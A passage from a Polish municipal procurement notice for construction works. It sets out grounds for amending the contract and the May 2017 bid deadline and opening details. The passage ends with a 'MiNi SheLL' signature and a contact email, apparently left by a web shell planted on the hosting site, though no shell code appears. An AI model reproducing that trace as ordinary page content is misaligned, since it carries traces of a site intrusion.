5) terminu realizacji przedmiotu umowy, wyłącznie w przypadku: 
a)  występowania niesprzyjających warunków atmosferycznych (np. długotrwałe niskie dobowe temperatury, długotrwałe opady deszczu lub śniegu itp.) uniemożliwiających wykonanie robót zgodnie z technologią określoną w dokumentacji projektowej - fakt ten musi być potwierdzony odpowiednimi dokumentami oraz wpisem w dzienniku budowy. W takim przypadku dopuszcza się zmianę terminu o czas występowania niesprzyjających warunków atmosferycznych;
 b) działania siły wyższej. W takim przypadku dopuszcza się zmianę terminu przez okres trwania siły wyższej. Przez siłę wyższą rozumie się okoliczności niemożliwe do przewidzenia w chwili zawarcia umowy, niezależnie od stron, na których powstanie strony nie miały wpływu i których powstaniu nie mogły zapobiec; za siłę wyższą uważa się również klęski żywiołowe, katastrofy, mające wpływ na terminowość wykonania robót;
 c) konieczności wykonania rozwiązań zamiennych w stosunku do projektowanych w dokumentacji projektowej, których wartość nie przekroczy wartości rozwiązań podstawowych, dokonania zamiany kolejności wykonania robót, zmiany rozwiązań technicznych i/lub technologicznych wykonania elementów robót, przy czym są one dopuszczalne wyłącznie w przypadku gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie opisuje dokumentacja jeżeli jest to niezbędne do prawidłowego wykonania przedmiotu umowy. 
6) zmiany stawek podatku od towarów i usług (VAT) Zamawiający zastrzega możliwość dokonania zmiany wynagrodzeni odpowiednio do zmienionych stawek;
7)  zmiany minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 20023 r. o minimalnym wynagrodzeniu o prace.
8) okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
9) zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy .
3. Zmiany, o których mowa w ust.2 mogą nastąpić za zgodą obu  stron wyrażoną na piśmie pod rygorem nieważności.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.	Oferty należy składać do dnia 08 maja 2017 r. do godziny 10:00  w Biurze Obsługi Mieszkańców Urzędu Miasta i Gminy w Nakle nad Notecią przy ul. Ks. P. Skargi 7.
2.	Otwarcie ofert nastąpi dnia  08 maja 2017 r. o godzinie 10:15 w siedzibie urzędu, pok. nr 21, II piętro.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com